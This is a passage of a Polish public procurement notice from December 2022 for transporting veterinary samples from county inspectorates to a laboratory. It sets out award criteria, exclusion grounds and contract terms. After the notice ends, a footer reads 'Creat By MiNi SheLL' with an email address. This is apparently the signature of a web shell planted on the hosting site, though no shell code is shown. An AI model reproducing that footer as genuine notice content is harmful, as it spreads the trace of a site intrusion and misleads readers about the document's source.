60%<br/>K1 = cena najniższa ze wszystkich ofert/cena oferty badanejx100pkt x60%<br/>K2 – Rok produkcji pojazdu przewidzianego do świadczenia usługi 30 % 30,00 K2= suma punktów otrzymanych za rok produkcji<br/>środka transportu (zgodnie z wykazem poniżej)/ liczba pojazdów (sztuk)<br/>K2 - Wykonawca otrzyma następującą liczbę punktów za rok produkcji środka przewozu:<br/>• 2011 i niżej otrzyma 0 pkt<br/>• 2012 otrzyma 5 pkt<br/>• 2013 otrzyma 10 pkt<br/>• 2014 do 2015 otrzyma 15 pkt<br/>• 2016 do 2017 otrzyma 20 pkt<br/>• 2018 do 2019 otrzyma 25 pkt<br/>• 2020 i nowsze otrzyma 30 pkt<br/>Niewskazanie roku produkcji środka przewozu przez Wykonawcę w formularzu ofertowym skutkuje odrzuceniem oferty na podstawie<br/>art. 226 ust. 1 pkt. 5 ustawy Pzp jako niezgodnej z warunkami zamówienia.<br/>Uwaga: Zamawiający zastrzega, że brak jest możliwości samowolnej zmiany pojazdu. Wskazane pojazdy do realizacji zamówienia<br/>będą musiały być wykorzystywane przez Wykonawcę. Zmiana środka przewozu w trakcie trwania usługi może nastąpić w przypadku<br/>sprzedaży pojazdu, uszkodzenia lub długotrwałej niesprawności. Zamawiający dopuszcza wykazanie się pojazdem podmiotu<br/>trzeciego.<br/>K3 – Maksymalny czas podstawienia zastępczego środka przewozu 10 %<br/>K3- Wykonawca otrzyma następującą liczbę punktów za czas podstawienia zastępczego środka przewozu liczony od momentu<br/>wystąpienia awarii i powiadomienia przedstawiciela Zamawiającego:<br/>• Do 4,0 godzin otrzyma 0 pkt<br/>• Do 3,0 godzin otrzyma 5 pkt<br/>• Do 2,0 godzin otrzyma 10 pkt<br/>Czas podstawienia zastępczego środka przewozu należy podać w pełnych godzinach. Jeżeli Wykonawca poda czas reakcji w<br/>minutach Zamawiający dokona przeliczenia na godziny i zaokrągli do pełnych godzin (w górę) (np. 210 min/60 min = 3,5 h, co daje<br/>rozpoczętą godzinę i wynosi 4,0h). Przy<br/>zaoferowaniu terminu dłuższego niż 4,0 h, bądź niewpisania czasu podstawienia środka zastępczego skutkuje odrzuceniem oferty<br/>na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp, jako niezgodnej z warunkami zamówienia.<br/>RAZEM 100%<br/>3) Całkowita liczba punktów jaką otrzyma oferta zostanie obliczona wg poniższego wzoru: K=K1 + K2+K3, gdzie:<br/>K – całkowita liczba punktów<br/>K1 – punkty uzyskane w kryterium „cena brutto oferty”<br/>K2 – punkty uzyskane w kryterium „rok produkcji pojazdu przewidzianego do świadczenia usługi”<br/>K3 – punkty uzyskane w kategorii „maksymalny czas podstawienia zastępczego środka przewozu”<br/>4) Ocena punktowa w kryterium<br/>K1 – „cena brutto oferty” zostanie dokonana na podstawie łącznej<br/>ceny ofertowej brutto wskazanej przez Wykonawcę w formularzu ofertowym, przeliczona zostanie według wzoru opisanego w tabeli<br/>powyżej.<br/>5) Ocena punktowa w kryterium<br/>K2 – „rok produkcji pojazdu przewidzianego do świadczenia usługi”<br/>zostanie dokonana według zasad opisanych w powyższej tabeli.<br/>6) Ocena punktowa w kryterium<br/>K3 – „maksymalny czas podstawienia zastępczego środka przewozu”<br/>zostanie dokonana według zasad opisanych w powyższej tabeli</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">rok produkcji pojazdu przewidzianego do świadczenia usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">maksymalny czas podstawienia zastępczego środka przewozu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W ramach zadania nr 4, Wykonawca zobowiązuje się do odbioru prób z:<br/>1) Powiatowego Inspektoratu Weterynarii w Nowej Soli, ul. Kossaka 24, 67-100 Nowa Sól, zwane dalej „PIW Nowa Sól”;<br/>2) Powiatowego Inspektoratu Weterynarii w Żaganiu, ul. Szprotawska 30B, 68-100 Żagań, zwane dalej „PIW Żagań”;<br/>3) Powiatowego Inspektoratu Weterynarii w Żarach z siedzibą w Lubsku, ul. Wrocławska 54,68-300 Lubsko, zwane dalej „PIW Żary z siedzibą w Lubsku”;<br/>4) Powiatowego Inspektoratu Weterynarii we Wschowie, ul. Kazimierza Wielkiego 4, 67-400 Wschowa, zwane dalej „PIW Wschowa”;<br/>5) Powiatowego Inspektoratu Weterynarii w Krośnie Odrzańskim, ul. Chopina 1, <br/>66-600 Krosno Odrzańskie, zwane dalej „PIW Krosno Odrzańskie”<br/>6) Powiatowego Inspektoratu Weterynarii w Zielonej Górze, ul. Browarna 4, <br/>65-849 Zielona Góra, zwane dalej „PIW Zielona Góra”<br/>i dostarczania ich bezpośrednio do Wojewódzkiego Inspektoratu Weterynarii w Zielonej Górze - Zakładu Higieny Weterynaryjnej, ul. Bohaterów Warszawy 4, 66-400 Gorzów Wielkopolski. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60000000-8 - Usługi transportowe (z wyłączeniem transportu odpadów)</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje prawo opcji. Przedmiot zamówienia określa zakres:<br/>- podstawowy: 5 088 km<br/>- opcjonalny: 2 544 km<br/>Łącznie: 7 632 km <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w<br/>kryteriów:<br/>a) Cena oferty brutto – K1<br/>b) Rok produkcji pojazdu przewidzianego do świadczenia usługi – K2<br/>c) Maksymalny czas podstawienia zastępczego środka przewozu– K3<br/>2) Powyższym kryteriom Zamawiający przypisał następujące znaczenia oraz sposób oceny:<br/>metoda punktowa wg wzoru<br/>K1- Cena brutto oferty 60%<br/>K1 = cena najniższa ze wszystkich ofert/cena oferty badanejx100pkt x60%<br/>K2 – Rok produkcji pojazdu przewidzianego do świadczenia usługi 30 % 30,00 K2= suma punktów otrzymanych za rok produkcji<br/>środka transportu (zgodnie z wykazem poniżej)/ liczba pojazdów (sztuk)<br/>K2 - Wykonawca otrzyma następującą liczbę punktów za rok produkcji środka przewozu:<br/>• 2011 i niżej otrzyma 0 pkt<br/>• 2012 otrzyma 5 pkt<br/>• 2013 otrzyma 10 pkt<br/>• 2014 do 2015 otrzyma 15 pkt<br/>• 2016 do 2017 otrzyma 20 pkt<br/>• 2018 do 2019 otrzyma 25 pkt<br/>• 2020 i nowsze otrzyma 30 pkt<br/>Niewskazanie roku produkcji środka przewozu przez Wykonawcę w formularzu ofertowym skutkuje odrzuceniem oferty na podstawie<br/>art. 226 ust. 1 pkt. 5 ustawy Pzp jako niezgodnej z warunkami zamówienia.<br/>Uwaga: Zamawiający zastrzega, że brak jest możliwości samowolnej zmiany pojazdu. Wskazane pojazdy do realizacji zamówienia<br/>będą musiały być wykorzystywane przez Wykonawcę. Zmiana środka przewozu w trakcie trwania usługi może nastąpić w przypadku<br/>sprzedaży pojazdu, uszkodzenia lub długotrwałej niesprawności. Zamawiający dopuszcza wykazanie się pojazdem podmiotu<br/>trzeciego.<br/>K3 – Maksymalny czas podstawienia zastępczego środka przewozu 10 %<br/>K3- Wykonawca otrzyma następującą liczbę punktów za czas podstawienia zastępczego środka przewozu liczony od momentu<br/>wystąpienia awarii i powiadomienia przedstawiciela Zamawiającego:<br/>• Do 4,0 godzin otrzyma 0 pkt<br/>• Do 3,0 godzin otrzyma 5 pkt<br/>• Do 2,0 godzin otrzyma 10 pkt<br/>Czas podstawienia zastępczego środka przewozu należy podać w pełnych godzinach. Jeżeli Wykonawca poda czas reakcji w<br/>minutach Zamawiający dokona przeliczenia na godziny i zaokrągli do pełnych godzin (w górę) (np. 210 min/60 min = 3,5 h, co daje<br/>rozpoczętą godzinę i wynosi 4,0h). Przy<br/>zaoferowaniu terminu dłuższego niż 4,0 h, bądź niewpisania czasu podstawienia środka zastępczego skutkuje odrzuceniem oferty<br/>na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp, jako niezgodnej z warunkami zamówienia.<br/>RAZEM 100%<br/>3) Całkowita liczba punktów jaką otrzyma oferta zostanie obliczona wg poniższego wzoru: K=K1 + K2+K3, gdzie:<br/>K – całkowita liczba punktów<br/>K1 – punkty uzyskane w kryterium „cena brutto oferty”<br/>K2 – punkty uzyskane w kryterium „rok produkcji pojazdu przewidzianego do świadczenia usługi”<br/>K3 – punkty uzyskane w kategorii „maksymalny czas podstawienia zastępczego środka przewozu”<br/>4) Ocena punktowa w kryterium<br/>K1 – „cena brutto oferty” zostanie dokonana na podstawie łącznej<br/>ceny ofertowej brutto wskazanej przez Wykonawcę w formularzu ofertowym, przeliczona zostanie według wzoru opisanego w tabeli<br/>powyżej.<br/>5) Ocena punktowa w kryterium<br/>K2 – „rok produkcji pojazdu przewidzianego do świadczenia usługi”<br/>zostanie dokonana według zasad opisanych w powyższej tabeli.<br/>6) Ocena punktowa w kryterium<br/>K3 – „maksymalny czas podstawienia zastępczego środka przewozu”<br/>zostanie dokonana według zasad opisanych w powyższej tabeli</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">rok produkcji pojazdu przewidzianego do świadczenia usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">maksymalny czas podstawienia zastępczego środka przewozu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Na podstawie art. 112 ustawy Pzp, Zamawiający określa warunki udziału w postepowaniu dotyczące:<br/>1) Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie<br/>2) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.<br/>3) Sytuacji ekonomicznej lub finansowej. Zamawiający uzna, że Wykonawca spełnia warunek, jeżeli wykaże, że:<br/>a) w zadaniu nr 1 – dysponuje polisą ubezpieczeniową od odpowiedzialności cywilnej na kwotę minimum 25 000,00 zł,<br/>b) w zadaniu nr 2 - dysponuje polisą ubezpieczeniową od odpowiedzialności cywilnej na kwotę minimum 25 000,00 zł,<br/>c) w zadaniu nr 3 – dysponuje polisą ubezpieczeniową od odpowiedzialności cywilnej na kwotę minimum 70 000,00 zł,<br/>d) w zadaniu nr 4 - dysponuje polisą ubezpieczeniową od odpowiedzialności cywilnej na kwotę minimum 25 000,00 zł,<br/>4) Zdolności technicznej lub zawodowej:<br/>a) Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu lub kryteriów selekcji, w<br/>stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach<br/>technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie<br/>od charakteru prawnego łączących go z nimi stosunków prawnych,<br/>b) w odniesieniu do warunków dotyczących doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów<br/>udostępniających zasoby, jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane,<br/>c) Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów. Wykonawca nie może, po upływie terminu składania ofert, powoływać<br/>się na zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym<br/>zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>d) Zamawiający będzie oceniał, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne<br/>lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania<br/>warunków udziału w postępowaniu, o których mowa w art. 112 ust. 2 pkt 3 i 4 ustawy Pzp, oraz będzie badał, czy nie<br/>zachodzą, wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem Wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Dopuszcza się możliwość zmian postanowień umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, zgodnie z art. 455 ust. 1 ustawy Pzp, w następującym zakresie i przy wystąpieniu określonych warunków:<br/>1)	odnoszących się przedmiotu umowy:<br/>a)	zwiększenie lub zmniejszenie liczby kilometrów przewidzianych dla danej trasy w razie konieczności jej zmiany o ponad 50 % liczby kilometrów dla danej trasy określonych w Opisie przedmiotu zamówienia, stanowiącym załącznik nr 1 do umowy,<br/>b)	zmniejszenie zakresu rzeczowego przedmiotu umowy (zmniejszenie liczby kilometrów wskazanych w Opisie przedmiotu zamówienia, stanowiącego załącznik nr 1 do umowy) o ponad 50 %, w szczególności w razie rezygnacji przez Zamawiającego ze świadczenia usług na określonej trasie lub w określone dni w związku ze zmniejszeniem zapotrzebowania na usługi, <br/>2)	odnoszących się do zmiany wynagrodzenia:<br/>a)	zmiana wynagrodzenia Wykonawcy wynikająca ze zmiany przepisów dotyczących podatku VAT powodujących zwiększenie lub zmniejszenie kosztów wykonania umowy po Stronie Wykonawcy, Zamawiający przewiduje możliwość proporcjonalnego zwiększenia lub zmniejszenia wynagrodzenia Wykonawcy;<br/>b)	zmiana wynagrodzenia w przypadku dokonania zmiany w zakresie przedmiotu umowy na podstawie którejkolwiek z okoliczności określonych w § 10 ust. 1 pkt 1 umowy z zastrzeżeniem, że: <br/>- w przypadku zmniejszenia bądź zwiększenia zakresu przedmiotu umowy (liczby kilometrów określonych dla każdej z tras w Opisie przedmiotu zamówienia, stanowiącego załącznik nr 1 do umowy), zmiana wynagrodzenia następuje proporcjonalnie do zmniejszonego bądź zwiększonego zakresu przedmiotu Umowy, zgodnie ze ryczałtową stawką brutto za 1 kilometr wskazaną w § 6 ust. 2 umowy; <br/>- zmiana ryczałtowej stawki brutto za 1 kilometr wskazanej w § 6 ust. 2 umowy, uwzględniająca odpowiednio wzrost lub zmniejszenie kosztów wykonania zamówienia, w przypadku, gdy rozwiązania wprowadzone w wyniku zmiany dotyczącej zakresu lub sposobu świadczenia usług wiążą się z poniesieniem odpowiednio mniejszych lub zwiększonych kosztów realizacji zamówienia;<br/>3) zmiana podwykonawcy, przy pomocy którego Wykonawca realizuje przedmiot zamówienia lub zakresu prac podwykonawcy – po uprzednim złożeniu wniosku i zaakceptowaniu go przez Zamawiającego. Podwykonawca musi spełniać takie same warunki jak wymagane od Wykonawcy.<br/>2.	Zmiany umowy, o których mowa w ust. 1, wymagają formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-13 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem formularzu dostępnego na platformie e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-13 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com